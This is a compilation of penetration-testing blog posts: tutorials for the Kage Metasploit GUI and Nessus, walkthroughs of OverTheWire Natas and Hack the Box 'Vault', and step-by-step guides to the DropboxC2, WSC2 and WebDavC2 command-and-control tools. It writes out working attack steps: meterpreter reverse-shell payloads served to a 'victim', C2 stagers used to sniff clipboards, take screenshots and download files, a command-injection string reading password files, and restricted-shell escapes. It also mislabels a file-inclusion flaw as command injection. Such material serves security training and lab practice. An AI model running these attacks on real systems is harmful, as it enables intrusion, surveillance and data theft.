
Kage: Graphical User Interface for Metasploit


Kage is a GUI for Metasploit RPC servers. It is a good tool for beginners to understand how Metasploit works, as it generates payloads and lets you interact with sessions. As the tool is still under development, it currently supports only windows/meterpreter and android/meterpreter. For it to work, Metasploit must be installed on your system. Its only dependency is npm.

Installation

Use the following git command to fetch Kage:

git clone https://github.com/WayzDev/Kage.git

Go inside the kage folder and install npm with the following command:

apt-get install npm

Then install the Node dependencies with the following command:

npm install

And then run it with the following command:

npm run dev

Once all the prerequisites are in place, Kage will start. Click on the Start Server button as shown in the image below:

The server will start running. Once the process completes, click on the Close button as shown in the image below:

After clicking the Close button, it automatically fills in all the connection details; you can then click on the Connect button to connect, as shown in the image below:

Once you are connected, it will show you the following window:

Under the Payload Generator heading, enter the details such as the file name (kage.exe), payload (windows/meterpreter/reverse_tcp), lhost (192.168.1.9) and lport (5252), and then click on Generate.

After clicking on Generate, it creates a new folder named kage (with a lowercase k). From here, run a Python HTTP server so that you can share your malware with the victim. To run the Python server, type:

python -m SimpleHTTPServer 80

Once the file is shared and executed, the following details appear under the Jobs heading:

When you go to the Sessions window through the dashboard, you will find that a new session has been created. Click on the Interact button to access the session.

After clicking on the Interact button, the following window will open. The first tab shows all the information about the system.

The second tab shows all the processes running on the victim’s PC.

And the third tab gives all the information about its network. Here, you can run three commands through the buttons provided, i.e. ifconfig, netstat and route, as shown in the image below:

Author: Shubham Sharma is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing.

The post Kage: Graphical User Interface for Metasploit appeared first on Hacking Articles.


Beginner’s Guide to Nessus


In this article, we will learn about Nessus, a network vulnerability scanner. There are various network vulnerability scanners, but Nessus is one of the best because of its highly usable GUI; therefore, it is widely used in many organizations. The tool was developed by Renaud Deraison in 1998.

Table of Content

  • Introduction to Nessus
  • Linux Installation
  • Running Vulnerability Scans
  • Windows Installation

Introduction to Nessus

Nessus is an open-source network vulnerability scanner that uses the Common Vulnerabilities and Exposures (CVE) architecture for easy cross-linking between compliant security tools. Nessus uses the Nessus Attack Scripting Language (NASL), a simple language that describes individual threats and potential attacks. Nessus has a modular architecture consisting of centralized servers that conduct the scanning and remote clients that allow administrator interaction. Administrators can include NASL descriptions of every suspected vulnerability to create customized scans. Notable capabilities of Nessus include:

  • Compatible with all OS
  • Scans for vulnerabilities in the local and remote host
  • Informs about missing security in detail
  • Applies various attacks in order to pinpoint a vulnerability
  • It can schedule security audits
  • Runs security tests

Linux Installation

Let’s start the installation on Linux. Here we are installing Nessus on an Ubuntu 18 machine. First, we invoke a root shell using the sudo bash command. We will install Nessus from a deb file that can be downloaded from the Nessus official website. We change to the directory where we downloaded the deb file, change its permissions, and then install the Nessus deb file using the dpkg command.

chmod 777 Nessus-8.2.3-ubuntu910_amd64.deb
dpkg -i Nessus*.deb

Afterwards, as shown in the image, use the following command to start Nessus:

/etc/init.d/nessusd start

This command will open our default browser, which in our case is Mozilla Firefox, and we will be greeted with a warning about the certificate. To use Nessus, we have to get past this warning: first click on Advanced, followed by Accept the Risk and Continue.

Then it will ask you to create an account; provide the details as shown in the image.

Further, it will ask you for an activation code; provide it as shown in the image below:

Once all the formalities are done, Nessus will open and allow you to perform any scan you desire, as shown in the image below:

Running Vulnerability Scans

When you click on Create New Scan, you will see the multiple scan types shown in the following image:

Then, in the Policies tab, you can define the different policies on which the scans are based.

There are various policy templates too, as shown in the image below:

To start a new scan, go to the scan templates, select a new scan, then give it a name and a target IP as shown in the following image:

Once the scan is done, it shows the result; the result clearly indicates the risk each vulnerability poses, rated from low to critical.

When you click on a vulnerability (here we clicked on the first one, which is a critical threat), it gives details about the vulnerability such as its severity, whether it is RPC-related or not, its version, etc., as shown in the image below:

Next, we clicked on a different one, which is a high-level threat; again it gives details about the vulnerability such as its severity, whether it is RPC-related or not, its version, etc., as shown in the image below:

Windows Installation

Download Nessus for Windows from the Nessus official website, then open it in the browser to set it up in the same way.

Just like on Linux, we will be greeted with a warning about the certificate. To use Nessus, we have to get past this warning: first click on Advanced, followed by Accept the Risk and Continue.

Then it will ask you to create an account; provide the details as shown in the image.

Further, it will ask you for an activation code; provide it as shown in the image below:

Then you can start your scans in the same way as shown above for Linux.

Author: Shubham Sharma is a Cybersecurity enthusiast and Researcher in the field of WebApp Penetration testing.


OverTheWire – Natas Walkthrough (0-11)


Today, we will play a war-game called Natas. It has a collection of 34 levels and is hosted by the OverTheWire organization. Absolute beginners are the target audience: it teaches the basics of server-side web security in a fun and challenging way. To play this war-game, go to the Natas website.

Objective

Find the password to log in to the next level.

Table of Content:

  • Introduction
  • Level 0
  • Level 0 → Level 1
  • Level 1 → Level 2
  • Level 2 → Level 3
  • Level 3 → Level 4
  • Level 4 → Level 5
  • Level 5 → Level 6
  • Level 6 → Level 7
  • Level 7 → Level 8
  • Level 8 → Level 9
  • Level 9 → Level 10
  • Level 10 → Level 11

Introduction

Natas levels are designed such that each level is a different website. To reach each website, we enter a URL in this format:

natasX.natas.labs.overthewire.org, where X is the Level Number.

To access a level, we use the username for that level (e.g. natas0 for level 0) and its password. The password for the next level is hidden somewhere in the current level, and we have to enumerate it. All the passwords are stored at /etc/natas_webpass/.

Level 0

This is a pretty simple level. The login credentials are given on the Natas introduction page. Just browse to the URL and enter them.

Username: natas0

Password:  natas0

Level 0 → Level 1

On successfully logging in to the natas0 webpage, we see the message “You can find the password for the next level on this page”, as shown in the figure below.

Now, as per convention, let’s look inside the source code. To view the source, right-click on the webpage and select ‘View Page Source’. There we have the password in a comment in the source code.

Level 1 → Level 2

We use the credentials extracted from the previous level to log in to Level 1.

Username: natas1

Password:  gtVrDuiDfck831PqWsLEZy5gyDz1clto

On successfully logging in to the natas1 webpage, we see the message “You can find the password for the next level on this page, but rightclicking has been blocked!”, as shown in the figure below.

Now, as right-clicking is disabled, we have to find another way to view the source code and retrieve the password from it. We are using Mozilla Firefox, where the ‘Ctrl + U’ shortcut opens the source code. And there we have the password in a comment in the source code.

Level 2 → Level 3

We use the credentials extracted from the previous level to log in to Level 2.

Username: natas2

Password:  ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi

On successfully logging in to the natas2 webpage, we see the message “There is nothing on this page”, as shown in the figure below.

So we check the source code of the page; here we find an image file named pixel.png located in the files directory.

We opened the files directory, as shown in the image below. In this directory, we find the user.txt file.

On opening it, we find the passwords for various users present on the target machine; the one we need is the password for natas3.

Level 3 → Level 4

We use the credentials extracted from the previous level to log in to Level 3.

Username: natas3

Password:  sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14

On successfully logging in to the natas3 webpage, we see the message “There is nothing on this page”, as shown in the figure below.

So we check the source code of the page, where we find a hint in a comment: “Not even Google will find it this time”. Search-engine spiders do not follow the links that are disallowed in the robots.txt file, so we check whether this website has one.

We opened robots.txt, as shown in the image below. In this file, we find that the /s3cr3t/ directory is disallowed. So let’s open the s3cr3t directory and see for ourselves what’s inside.

In this directory, we find the user.txt file.

On opening it, we find the login credentials of the user natas4.

Level 4 → Level 5

We use the credentials extracted from the previous level to log in to Level 4.

Username: natas4

Password: Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

On successfully logging in to the natas4 webpage, we see the message: Access disallowed. You are visiting from "" while authorized users should come only from "//natas5.natas.labs.overthewire.org/", as shown in the figure below.

We capture the request in Burp Suite; here we see a header named Referer. Its value says natas4.

We change the Referer value to natas5, as shown in the image below.

After forwarding the request, we get the credentials of the user natas5.

Level 5 → Level 6

We use the credentials extracted from the previous level to log in to Level 5.

Username: natas5

Password:  iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

On successfully logging in to the natas5 webpage, we see the message “Access disallowed. You are not logged in”, as shown in the figure below.

We capture the request in Burp Suite; here we see a parameter named loggedin. It is set to 0.

We change the loggedin parameter value to 1, as shown in the image below.

After forwarding the request, we get the credentials of the user natas6.

Level 6 → Level 7

We use the credentials extracted from the previous level to log in to Level 6.

Username: natas6

Password: aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

On successfully logging in to the natas6 webpage, we see a form. It says “Input secret:”, as shown in the figure below.

We went ahead and looked for clues about the secret we have to enter to get the credentials for the next level. In the source we see that a file called ‘secret.inc’ is included.

So, to grab the secret, we browse to the included file manually: as shown in the image, we add /include/secret.inc to the URL. This gave us a blank page in response, so we viewed its source code and found the secret in a comment.

We copied the secret and went back to the form that was asking for it. After entering the secret, we get the login credentials for the next level.

Level 7 → Level 8

We use the credentials extracted from the previous level to log in to Level 7.

Username: natas7

Password:  7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

On successfully logging in to the natas7 webpage, we are given two links, Home and About, as shown in the figure below.

So we check the source code of the page. Here, we can see the links “index.php?page=” in the image. We are also given a hint about the location of the password, i.e. /etc/natas_webpass/natas8.

As we can see in the image, the link is shown in the address bar of our browser after clicking the Home link.

So we modify the link to read the password stored in natas_webpass.

//natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8

And we have the password for the next level. This is called command injection.

Level 8 → Level 9

We use the credentials extracted from the previous level to log in to Level 8.

Username: natas8

Password:  DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

On successfully logging in to the natas8 webpage, we see a form. It says “Input secret:”, as shown in the figure below.

We opened the source code and found that the secret is stored in encoded form, along with the function that encodes it.

Hence, to decode the secret, we just write a function that reverses the encoding. This can be done as shown in the image:

php -a
echo base64_decode(strrev(hex2bin('3d3d516343746d4d6d6c315669563362')));

Now that we have the decoded secret, we can use it to extract the credentials from the natas8 webpage, as shown in the image.
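The same decoding chain as the PHP one-liner above, written in Python as an added example (this is not code from the original post). The encoder is simply the inverse of the page's three decoding steps, so the round trip checks that the steps were undone in the right order; the hex string is the one quoted on the page.

```python
import base64
import binascii

# Hex string quoted on the page above (the encoded natas8 secret).
ENCODED_SECRET = "3d3d516343746d4d6d6c315669563362"


def encode_secret(secret: str) -> str:
    """Inverse of decode_secret(): base64-encode, reverse, then hex-encode.
    In PHP terms this is bin2hex(strrev(base64_encode($secret)))."""
    b64 = base64.b64encode(secret.encode()).decode()
    return binascii.hexlify(b64[::-1].encode()).decode()


def decode_secret(encoded_hex: str) -> str:
    """Mirrors the page's PHP: base64_decode(strrev(hex2bin($hex))).
    Done step by step because the inverse operations must run in this order:
    hex-decode first, then reverse, then base64-decode."""
    reversed_b64 = binascii.unhexlify(encoded_hex).decode()   # hex2bin
    b64 = reversed_b64[::-1]                                   # strrev
    return base64.b64decode(b64).decode()                      # base64_decode


if __name__ == "__main__":
    secret = decode_secret(ENCODED_SECRET)
    print(secret)
    # Re-encoding the recovered secret must reproduce the original hex string.
    assert encode_secret(secret) == ENCODED_SECRET
```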

Level 9 → Level 10

We use the credentials extracted from the previous level to log in to Level 9.

Username: natas9

Password:  W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

On successfully logging in to the natas9 webpage, we see a form. It says “Find words containing”, as shown in the figure below.

We opened the source code and found that when we enter a keyword, it is passed to a function called passthru(). It takes the value in $key and executes it directly as part of a shell command.

So we use a semicolon (;) to execute multiple commands, and try to read the password for the next level:

;cat /etc/natas_webpass/natas10

As we can see, the password is printed on the screen, as shown in the image.

Level 10 → Level 11

We use the credentials extracted from the previous level to log in to Level 10.

Username: natas10

Password:  nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

On successfully logging in to the natas10 webpage, we see a form. It says “For security reasons, we now filter on certain characters. Find words containing”, as shown in the figure below.

We opened the source code and found that, as before, the keyword is passed to passthru(), which takes the value in $key, but this time the input is filtered for the characters (/;|&), as shown in the image.

So we use (.*) instead, and try to read the password for the next level:

.*/etc/natas_webpass/natas10

As we can see, the password is printed on the screen, as shown in the image.
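Levels 9 and 10 both hinge on the keyword reaching passthru() as raw shell text. As an added example (not from the original post, and written in Python rather than the level's PHP), here is the defensive counterpart: a denylist check mirroring natas10's (which still lets the level-10 input through) beside an allowlist plus argument-list invocation of grep that rejects both inputs before anything runs. The word list and file path are constructed for the demo.

```python
import re
import subprocess
import tempfile
from pathlib import Path

# Constructed stand-in for the levels' dictionary.txt (not the real file).
DICTIONARY_WORDS = ["hack", "hacker", "hacking", "password", "shell"]

# Allowlist: a word lookup only ever needs letters. Anything else, including
# the ';' used on natas9 and the '.*' plus path used on natas10, is rejected.
SAFE_KEY = re.compile(r"^[A-Za-z]{1,32}$")


class UnsafeKey(ValueError):
    """Raised when the search term fails the allowlist check."""


def denylist_passes(key: str) -> bool:
    """Mirrors the natas10 style check: reject only the characters ; | &.
    Note it says nothing about wildcards or extra file arguments to grep."""
    return not any(c in key for c in ";|&")


def safe_search(key: str, dictionary: Path) -> list[str]:
    """Hardened equivalent of natas9's passthru("grep -i $key dictionary.txt").

    Two independent defenses:
      1. the allowlist rejects every non-alphabetic key before any command runs;
      2. grep gets an argument list (no shell), so the key can never be parsed
         as shell syntax, and '--' stops it being read as a grep option.
    """
    if not SAFE_KEY.fullmatch(key):
        raise UnsafeKey(f"rejected search term: {key!r}")
    result = subprocess.run(
        ["grep", "-i", "--", key, str(dictionary)],
        capture_output=True, text=True, check=False,
    )
    # grep exits 1 when nothing matched; that is a normal empty result here.
    if result.returncode not in (0, 1):
        raise RuntimeError(result.stderr.strip())
    return result.stdout.split()


def make_dictionary() -> Path:
    """Writes the constructed word list to a temp file and returns its path."""
    path = Path(tempfile.mkdtemp()) / "dictionary.txt"
    path.write_text("\n".join(DICTIONARY_WORDS) + "\n")
    return path


def is_rejected(key: str) -> bool:
    """True if safe_search() refuses the key without running grep at all."""
    try:
        safe_search(key, make_dictionary())
    except UnsafeKey:
        return True
    return False


if __name__ == "__main__":
    d = make_dictionary()
    print(safe_search("hack", d))
    for payload in (";cat /etc/natas_webpass/natas10", ".*/etc/natas_webpass/natas10"):
        print(f"{payload!r}: denylist={'pass' if denylist_passes(payload) else 'block'}, "
              f"allowlist={'block' if is_rejected(payload) else 'pass'}")
```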

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester.


Command and Control with DropboxC2


In this article, we will learn how to use the DropboxC2 tool, also known as DBC2.

Table of Content:

  • Introduction
  • Installation
  • Getting Dropbox API
  • Exploiting Target
  • Sniffing Clipboard
  • Capturing Screenshot
  • Command Execution
  • File Download

Introduction

DBC2 is primarily a post-exploitation tool. It consists of an agent running on the target’s machine, a controller running on any machine, PowerShell modules, and Dropbox servers used as the communication channel. It is inspired by the PowerShell Empire framework. The tool is developed in Python. The credit for developing it goes to Arno0x0x.

For this particular demonstration,

Attacker: Kali Linux

Target: Windows 10

Installation

To begin, we need the tool on our attacker machine, so we clone it directly from GitHub.

git clone https://github.com/Arno0x/DBC2

After running the above command, we have a directory named DBC2. We move into that directory using the cd command and then install the tool’s dependencies. There are multiple ways to do this, but here we use the pip command with the requirements.txt file that we cloned earlier.

cd DBC2/
pip install -r requirements.txt

Getting Dropbox API

This tool uses Dropbox servers as the medium for controlling agents on the target machine, and for that it requires a Dropbox API access token. To get one, first create an account on Dropbox, then go to the Dropbox developer console. A webpage similar to the one shown below will open. Here select “Dropbox API”; in the type of access section, choose “App folder”; name the app as you like; then click on the Create App button to proceed.

This leads to another webpage, as shown below. Here, move on to the OAuth 2 section and click Generate access token. This gives the Dropbox API token required for this practical.

Copy the generated access token and go to the directory we cloned earlier. It contains a file named config.py; open it with nano and paste the access token as the value of “defaultAccessToken”, as shown in the screenshot below.

Exploiting Target

Now it’s time to run the tool; check that it has the appropriate permissions before running it. When we run it, we are greeted with a cool-looking banner as shown below, followed by some details about the author, version and tool. After this, it asks for a master password, which is used to encrypt all the data exchanged between the agents and the controller. Enter a password of your choice; the tool encrypts the entered password and displays the result, which we can copy into config.py so that it does not ask for the master password again. After this, it creates an incoming directory inside the cloned directory, used as a buffer to save files retrieved from the target.

python dropboxC2.py

The tool requires the modules and the stage to be uploaded to Dropbox before proceeding. We do this using the command given below.

publishStage dbc2_agent.exe

This uploads a file to Dropbox, as shown in the image below. This file is encrypted using XOR encryption.

Now let’s check if the stage is published using the command given below:

listPublishedStage

Now that the stage is uploaded, let’s use it to create a stager. We are going to create a batch file, but many other stager types are available: this tool provides stagers as a macro, a one-liner, JavaScript, MSBuild, sct and more. This command creates a stager.bat in the tmp directory, which we send to our target machine.

genStager batch default

After the batch file is executed on the target machine, we are informed on the terminal with a message that an agent was found, along with its ID. We use the list command to see the list of agents, then copy the AgentID and use it to interact with the session, as shown in the image.

list
use [AgentID]

This creates a file on Dropbox with the .status extension, as shown in the image.

Clipboard Sniffing

We can get the data the target has on their clipboard, i.e. the data they have copied. To do this, start the sniffer with the command clipboardLogger start, wait until the target copies some data, then stop the sniffer with the command clipboardLogger stop. After stopping the sniffer, the clipboard contents are saved in a text file inside the incoming directory.

clipboardLogger start
clipboardLogger stop

Let’s take a look at what the target copied on their machine. We use the cat command in a new Kali terminal to read the file, as shown in the image.

cat /root/DBC2/incoming/clipboardlogger.txt

Capturing Screenshot

Furthermore, we can grab a screenshot of the target machine using the screenshot command, as shown in the image.

screenshot

The screenshot is captured and stored in the incoming directory. In the image we can see that the target is browsing a website on their machine.

Command Execution

We can run PowerShell commands on the target machine using the cmd command. The tool does not offer an interactive shell, but it can execute one command at a time: we type cmd and it then asks for the command to execute. Here we run dir, and we get the list of files as shown in the image.

cmd
dir

File Download

Furthermore, we can download files from the target using the command getFile followed by the file name or path. This downloads the file from the target to our attacker machine.

getFile sharetext.txt

The tool downloads the file into the incoming directory discussed earlier. We can view the file using the cat command, as shown in the image below.

cat /root/DBC2/incoming/sharetext.txt

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester.


Hack the Box Vault: Walkthrough


Today we are going to solve another CTF challenge, “Vault”. It is a retired vulnerable lab presented by Hack the Box to help pentesters practise online penetration testing at their experience level; they have a collection of vulnerable labs as challenges, from beginner to expert level.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are available online, they have a static IP. The IP of this machine is 10.10.10.109.

Penetrating Methodology

  • Network scanning (Nmap)
  • Surfing the IP address on the browser
  • Surfing directories on the browser
  • Using dirb for directory scanning
  • Creating Payload using msfvenom
  • Getting Meterpreter Session
  • Enumerating through directories
  • Getting SSH login credentials
  • Logging into SSH
  • Pinging Host IP
  • Scanning Ports on Host IP
  • Dynamic Port forwarding with SSH
  • Updating the VPN Configuration file
  • Executing Netcat listener
  • Finding user.txt
  • Getting SSH Login Credentials
  • Using the proxy command option
  • Escaping restricted shell
  • Using gpg to decrypt root.txt.gpg file
  • Converting the file into a base64 string using python3m
  • Using echo to decode the string
  • Reading our Root Flag

Walkthrough

Let’s start off with our basic Nmap command to find out the open ports and services.

nmap -p- -sV -sC 10.10.10.109

As port 80 is running HTTP service, we open the IP address in the web browser.

We thought of opening sparklays in the browser along with the machine’s IP, but it turned out to be forbidden.

We don’t find anything on the web page, so we enumerate the web service further using a dirb scan.

dirb http://10.10.10.109/sparklays/ -w

From the dirb scan, we found a useful directory, /design/design.html, which we opened in the browser. The only thing left to do on this page is to click on Change Logo.

It redirected us to a file upload page.

Now we use msfvenom to generate a malicious PHP file.

msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.13.234 lport=1234 -f raw > shell.php5

We have successfully uploaded the malicious file.

On the other hand, we have set up a listener using the Metasploit framework.

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost tun0
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > run

Let’s open our malicious file using the browser.

Finally, we have got the meterpreter.

sysinfo

While looking for our first flag, we found some useful credentials for SSH login.

Username- dave

Password- Dav3therav3123

cd Desktop
ls -al
cat Servers
cat key
cat ssh

Time to log in to SSH.

Username- dave

Password- Dav3therav3123

We use the ping command to find all the available machines in the 192.168.122.x range (hosts .1 to .255).

for i in {1..255}; do ping -c 1 192.168.122.$i | grep 'from' ; done

Let’s use the following command to scan the ports of 192.168.122.4 to see what we are up against.

Now connect to the client machine using the command below.

ssh -D 8080 dave@10.10.10.109

Password- Dav3therav3123

We set the browser’s proxy to point to socks5://127.0.0.1:8080.

Let’s open the IP 192.168.122.4 in the browser and see where it takes us. Click on the VPN Configuration link.

It took us to a page where we need to update the VPN file. We found the details in the Test VPN link.

We simply pasted and modified the details, giving the IP address of the target machine along with port 1234, and clicked on Update File.

On the other hand, we have started a listener on port 1234.

nc -lvp 1234

We easily get root access. Now we enumerate directories to find user.txt.

cd /root
ls
ls -al

After some digging, we have found our first flag.

ls
cd dave
ls
cat user.txt

Now we thought of reading the logs, as we were totally out of hints. While looking at the logs we found something interesting: the firewall accepts inbound traffic from source port 4444/tcp to host 192.168.5.2, which is listening on 987/tcp.

So, to find out what’s running on 987/tcp, use the following command.

ncat -p 4444 192.168.5.2 987

It turned out to be an SSH service.

We again found credentials for SSH login.

Username- dave

Password- dav3gerous567

cat ssh

What are we waiting for? Time to log in to SSH; here we again find user.txt.

ssh dave@192.168.122.4

Password- dav3gerous567

ls
cat user.txt

Since dave has a restricted default shell, we use the ProxyCommand option to log in again through the allowed source port.

ssh -o 'Proxycommand ncat -p 4444 %h %p' -p 987 dave@192.168.5.2

After logging in as user “monitor”, we find that we have a restricted shell and are not able to change the SHELL variable. After spawning a TTY shell, we are able to change the SHELL environment variable.

echo $SHELL
export SHELL=/bin/bash:$SHELL
python
bash
export SHELL=/bin/bash:$SHELL

We tried decrypting the file root.txt.gpg but couldn’t succeed, since it requires a secret key.

gpg -d root.txt.gpg

There are not many options left, so let’s convert it into a base64-encoded string using python3m.

python3m -c "import base64;print(base64.b64encode(open('root.txt.gpg', 'rb').read()))"

We copied and pasted the encoded string to the Ubuntu machine and decoded it. Since we found the passphrase ‘itscominghome’, we can easily open the file root.txt.gpg to read our final flag.

Finally, we have read our Final Flag.

gpg -d root.txt.gpg

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles, contributing years in the field of security as a Penetration Tester and Forensic Computer Analyst.


Command & Control: WebSocket C2


In this article, we will learn how to use the WebSocket C2 tool, also known as WSC2.

Table of Content:

  • Introduction
  • Installation
  • Exploiting Target
  • Command Execution
  • File Download

Introduction

WSC2 is primarily a post-exploitation tool. It uses WebSockets and a browser process as a C2 communication channel between an agent running on the target system and a controller acting as the actual C2 server. The tool is developed in Python. The credit for developing it goes to Arno0x0x.

For this particular demonstration,

Attacker: Kali Linux

Target: Windows 10

Installation

To begin, we need the tool on our attacker machine, so we clone it directly from GitHub.

git clone https://github.com/Arno0x/WSC2.git

After running the above command, we have a directory named WSC2. We move into that directory using the cd command and list its contents using the ls command.

cd WSC2/
ls

After that, we install the tool’s dependencies. There are multiple ways to do this, but here we use the pip command with the requirements.txt file that we cloned earlier.

pip install -r requirements.txt

As we saw earlier, there is a config.py file inside the cloned directory. We have to make some changes to it in order to get the session on our system, so we edit it with nano. As shown in the figure, config.py contains a variable CALLBACK holding an IP address; we changed it to the IP address of our attacker machine, i.e. Kali Linux.

nano config.py

Exploiting Target

Now it’s time to run the tool; check that it has the appropriate permissions before running it. When we run it, we are greeted with a cool-looking banner as shown below, followed by some details about the author, version and tool. After this, it creates an incoming directory inside the cloned directory, used as a buffer to save files retrieved from the target.

./wsc2.py

We are going to create a JScript stager. Several stager types are available: this tool provides the stagers jscript1, jscript2 and jscript3. We use jscript1 here because it does not need to be compiled, while the rest do. This command creates wsc2Agent1.js in the stagers directory.

genStager jscript1

Now let’s get the file to the target machine. Open a new terminal, move into the stagers directory using the cd command, and serve the file to the target with a Python HTTP server. This can be done with any other method of choice.

cd stagers/
ls
python -m SimpleHTTPServer 80

After the JScript file is executed on the target machine, we are informed on the terminal with the message “New agent connected”. Now we use the list command to see the list of agents.

list

And then we will copy the AgentID and then use it to interact with the session as shown in the given image.

use [AgentID]

Command Execution

We can run some PowerShell commands on the target machine using the command cli. Here we run the command systeminfo. And we have the system information of the target as shown in the given image.

cli
systeminfo

File Download

Furthermore, we can download files from the target. To do this we use the command getFile followed by the file name or path. This downloads the file from the target to our attacker machine.

help getFile
getFile sample_text.txt

The tool will download the file inside the incoming directory we discussed earlier. We can view the file using cat command as shown in the image given below.

cd incoming/
ls
cat sample_file.txt

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

The post Command & Control: WebSocket C2 appeared first on Hacking Articles.

Command & Control: WebDav C2


In this article, we will learn how to use WebDav C2 tool.

Table of Content:

  • Introduction
  • Installation
  • Exploiting Target
  • Command Execution

Introduction

WebDavC2 uses the WebDAV protocol with PROPFIND-only requests to serve as a C2 communication channel between an agent, running on the target system, and a controller acting as the actual C2 server. This tool is developed in Python. The credit for developing this tool goes to Arno0x0x.

WebDavC2 is composed of a controller, which acts as the C2 server, and an agent, written in C#/.Net, which runs on the target system and is delivered there via one of several initial stagers. The stagers (created on the fly when the controller starts) are used for the initial compromise of the target system.
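Because the agent described above talks to its controller with nothing but PROPFIND requests, the traffic pattern itself is a detection opportunity for whoever owns the web server logs. The following is an added example for this article, not part of WebDavC2: it parses access log lines in Apache combined format and reports clients that send only PROPFIND, at a regular interval. The log lines are constructed, and the thresholds (minimum request count, allowed timing jitter) are assumptions.

```python
"""Spot PROPFIND-only beaconing in web server access logs.

Added example for this article; it is not part of WebDavC2. The log lines
below are constructed in Apache combined format, and the thresholds
(minimum request count, allowed timing jitter) are assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime
from statistics import mean

# Apache "combined" format: client, identd, user, [timestamp], "METHOD path proto", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Return a dict with ip, timestamp, method and path, or None for unparseable lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"],
    }


def find_propfind_beacons(lines, min_requests=5, max_jitter=0.25):
    """Clients that issue nothing but PROPFIND, at regular intervals.

    A normal WebDAV client mixes OPTIONS, PROPFIND, GET and PUT; an agent that
    polls its controller with PROPFIND alone on a fixed timer stands out.
    Returns (ip, request_count, mean_gap_seconds) tuples.
    """
    by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_ip[rec["ip"]].append(rec)

    suspects = []
    for ip, recs in by_ip.items():
        if {r["method"] for r in recs} != {"PROPFIND"} or len(recs) < min_requests:
            continue
        times = sorted(r["ts"] for r in recs)
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        avg = mean(gaps)
        # fixed timer: every gap stays within max_jitter of the average gap
        if avg > 0 and all(abs(g - avg) <= max_jitter * avg for g in gaps):
            suspects.append((ip, len(recs), round(avg, 1)))
    return suspects


# Constructed sample: 192.168.1.20 polls every 5 s with PROPFIND only;
# 192.168.1.30 behaves like an interactive WebDAV client.
SAMPLE_LOG = [
    '192.168.1.20 - - [10/Mar/2019:10:00:00 +0000] "PROPFIND / HTTP/1.1" 207 512 "-" "Microsoft-WebDAV-MiniRedir/10.0"',
    '192.168.1.30 - - [10/Mar/2019:10:00:02 +0000] "OPTIONS /share/ HTTP/1.1" 200 0 "-" "Microsoft-WebDAV-MiniRedir/10.0"',
    '192.168.1.20 - - [10/Mar/2019:10:00:05 +0000] "PROPFIND / HTTP/1.1" 207 512 "-" "Microsoft-WebDAV-MiniRedir/10.0"',
    '192.168.1.30 - - [10/Mar/2019:10:00:06 +0000] "PROPFIND /share/ HTTP/1.1" 207 1024 "-" "Microsoft-WebDAV-MiniRedir/10.0"',
    '192.168.1.20 - - [10/Mar/2019:10:00:10 +0000] "PROPFIND / HTTP/1.1" 207 512 "-" "Microsoft-WebDAV-MiniRedir/10.0"',
    '192.168.1.30 - - [10/Mar/2019:10:00:11 +0000] "GET /share/report.docx HTTP/1.1" 200 40960 "-" "Microsoft-WebDAV-MiniRedir/10.0"',
    '192.168.1.20 - - [10/Mar/2019:10:00:15 +0000] "PROPFIND / HTTP/1.1" 207 512 "-" "Microsoft-WebDAV-MiniRedir/10.0"',
    '192.168.1.20 - - [10/Mar/2019:10:00:20 +0000] "PROPFIND / HTTP/1.1" 207 512 "-" "Microsoft-WebDAV-MiniRedir/10.0"',
    '192.168.1.20 - - [10/Mar/2019:10:00:25 +0000] "PROPFIND / HTTP/1.1" 207 512 "-" "Microsoft-WebDAV-MiniRedir/10.0"',
]

if __name__ == "__main__":
    for ip, count, gap in find_propfind_beacons(SAMPLE_LOG):
        print(f"{ip}: {count} PROPFIND-only requests, one every {gap}s")
```

The method-set check is what separates an agent from a real WebDAV client: Windows’ Mini-Redirector, for instance, starts with OPTIONS and follows PROPFIND with GET or PUT. Feed it a real log with a longer window and a higher min_requests to cut down on one-off false positives from directory listings.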

For this particular demonstration,

Attacker: Kali Linux

Target: Windows 10

Installation

To begin, we first need the tool on our attacker machine. To do this, we clone the tool directly from GitHub.

git clone https://github.com/Arno0x/WebDavC2

After running the above command, we have a directory created by the name of WebDavC2. Now we traverse inside that directory using the cd command, list its contents using the ls command and make the script executable.

cd WebDavC2/
ls
chmod +x webdavC2.py

Exploiting Target

As we run the tool, we are greeted with a cool looking banner as shown in the image below, followed by some details about the author, the version and the tool. After this it creates multiple stagers in Batch, Macro and JScript as shown in the figure below. It also starts a WebDAV server on the IP provided, at port 80.

python webdavC2.py

Now we have to send the files to the target. For this we open a new terminal and traverse inside the stagers directory. Here we can see that we have multiple stagers. Let’s try to open the batch file; here we see that the PowerShell batch file is encrypted. Now we send these stagers to the target using the Python server.

cd stagers/
ls
cat stager.bat
python -m SimpleHTTPServer 80

Command Execution

After the stager is executed, we are provided with a prompt to run commands. Here we run the command systeminfo. And we have the system information of the target as shown in the given image.

systeminfo

